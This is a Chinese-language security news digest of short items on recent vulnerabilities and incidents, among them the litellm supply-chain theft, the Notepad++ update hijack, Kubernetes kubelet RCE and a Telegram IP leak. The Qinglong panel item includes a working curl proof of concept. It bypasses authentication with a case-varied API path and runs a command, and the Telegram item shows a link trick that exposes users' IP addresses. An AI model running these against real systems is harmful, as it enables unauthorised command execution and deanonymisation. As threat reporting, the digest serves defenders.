赛博安全威胁情报🥸

利用Claude挖掘Vim、Emacs 0day 漏洞 原文：https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude vim 公告：https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/vim.md 挖掘 vim 完整提示词： https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/vim-claude-prompts.txt Emacs 公告： https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/Emacs.md 挖掘 Emacs 完整提示词： https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/emacs-claude-prompts.txt

大模型路由网关库 litellm 被供应链投毒。木马写了个 bug，某些情况下会直接导致目标设备卡死宕机，才被发现 恶意代码会系统性地收集主机上的敏感数据：SSH 密钥、AWS/GCP/Azure 云凭证、Kubernetes 密钥、环境变量文件、数据库配置，甚至加密货币钱包。收集完毕后加密打包，发送到攻击者控制的域名。 https://futuresearch.ai/blog/litellm-pypi-supply-chain-attack/

永信至诚大量内部数据泄露 #吃瓜

青龙面板 最新版本 0day 鉴权绕过导致 RCE 青龙面板最新版存在一处鉴权绕过漏洞，未认证请求可访问高权限接口，并最终触发命令执行。 攻击者可通过大小写变形路径（如 /API/...）绕过鉴权 curl -X PUT "http://localhost:5700/aPi/system/command-run" \ -H "Content-Type: application/json" \ -d '{"command": "id"}' #威胁情报#poc

Notepad++ 官方更新被劫持植入后门 从 2025 年 6 月至 2025 年 12 月 2 日，有攻击者成功入侵 Notepad++ 使用的共享主机基础设施，使他们能够拦截并选择性地将发往 notepad-plus-plus.org 的更新流量重定向到恶意服务器。 此次劫持并不是因为 Notepad++ 程序代码自身存在漏洞，而是利用了主机提供商环境的弱点以及旧版本 Notepad++ 更新验证不足的情况。被重定向的流量返回了被篡改的更新清单 https://notepad-plus-plus.org/news/hijacked-incident-info-update/ #威胁情报#吃瓜

虚拟机面板漏洞导致多个IDC服务商被入侵 虚拟机WEB控制面板 Virtualizor 上存在一个严重漏洞，该漏洞已被黑客用于植入勒索病毒。根据 Low End Web Deals 频道搜集到 LowEndTalk 上的消息，除 CloudCone 外，使用该面板的商家 HostSlick、OuiHeberg、ColoCrossing 也已被攻破。 以下服务商也使用 Virtualizor 提供服务：Virtono、SolidSEOVPS、Naranjatech、LittleCreek、DediRock、Chunkserv、RareCloud #吃瓜#威胁情报

通过 node/proxy GET 权限实现 Kubernetes 远程代码执行 (RCE) 任何能够访问分配了节点/代理 GET 权限的服务账户，并能通过 10250 端口访问节点 Kubelet 的人，都可以向 /exec 端点发送信息，在任何 Pod（包括特权系统 Pod）中执行命令，这可能会导致整个集群被攻破。Kubernetes 审计策略不会记录通过直接连接到 Kubelet API 执行的命令。 文章： https://grahamhelton.com/blog/nodes-proxy-rce https://gist.github.com/grahamhelton/f5c8ce265161990b0847ac05a74e466a https://labs.iximiuz.com/tutorials/nodes-proxy-rce-c9e436a9 #好文推荐

Windows Telephony 服务权限提升漏洞（CVE-2026-20931） 该漏洞源于 Windows Telephony 服务在处理 Remotesp 相关场景下的 ClientAttach RPC 调用时，未对用户可控的 Mailslot 文件路径进行充分校验。 本地攻击者可通过构造恶意 RPC 请求，绕过权限限制，越权读写 Telephony 服务的配置文件，从而获得对服务配置的控制权限。攻击者随后可通过篡改服务配置使其加载恶意 DLL，在服务重启后以 SYSTEM 权限执行任意代码，最终实现本地权限提升。 🔗https://swarm.ptsecurity.com/whos-on-the-line-exploiting-rce-in-windows-telephony-service/ 🔗https://habr.com/ru/companies/pt/articles/984934/ #好文推荐

Cloudflare 的 Web 应用程序防火墙 (WAF) 中存在一个严重的零日漏洞，攻击者可以利用该漏洞绕过安全控制，并通过证书验证路径直接访问受保护的源服务器。 https://fearsoff.org/research/cloudflare-acme #好文推荐

网络工程师李某以技术手段窃取赌博网站184万余名中国公民个人信息，窃取返佣资金3000万余元，被控涉嫌两罪名；警方已扣押其180余个比特币 2020年，李东从“开云体育”赌博网站的代理账户中，选取返佣比例高、下线多的代理账户，将这些代理账户的返佣银行账户替换成自己所控制的银行账户，窃取“开云体育”赌博网站的代理返佣资金共计人民币3550万余元。其中，644万余元转入李东购买的13张银行卡；另外，利用某团伙购买比特币等虚拟货币转入李东钱包，这部分盗窃资金有2905万余元。 https://mp.weixin.qq.com/s/xQc87bFzg9HpvqZcg1q0Yg #吃瓜

泄露 Telegram 真实 IP 1-click 漏洞 通过重设代理暴露真实 IP • Telegram 在添加代理之前会自动 ping 代理。 • 该请求绕过了所有已配置的代理 • 你的真实 IP 地址会被立即记录 只需点击一下即可显示你的真实 IP 地址。 会影响安卓和iOS版本的Telegram客户端 用户名后隐藏的链接示例： [ @nickname ]( t.me/proxy?server=1… ) #poc#威胁情报

电诈头目、太子集团创始人陈志被捕并遣送中国 太子集团（Prince Group）创始人兼董事长陈志在柬埔寨被捕，并已被遣送回中国，接受有关部门调查。 陈志运营的太子集团自称为一家跨国商业集团，在柬埔寨布局度假村与酒店等项目，是柬埔寨最大的企业集团之一。但该集团实际上使用虚假的招聘广告诱骗工人，以酷刑强迫他们进行电信诈骗。工人则诱骗受害者们转移加密货币，以获得巨额的投资回报。 2025年10月，陈志因涉嫌策划一场涉及强迫劳动的跨国“杀猪盘”加密货币骗局，被美国司法部正式起诉，美国政府宣布查获了约127271枚比特币，价值达150亿美元（约合人民币1069亿元），同时，美国司法部指控太子地产集团为亚洲最大的跨国犯罪组织之一。 同年10月30日，陈志及其“太子集团”在新加坡1.5亿新元资产被冻结。 #吃瓜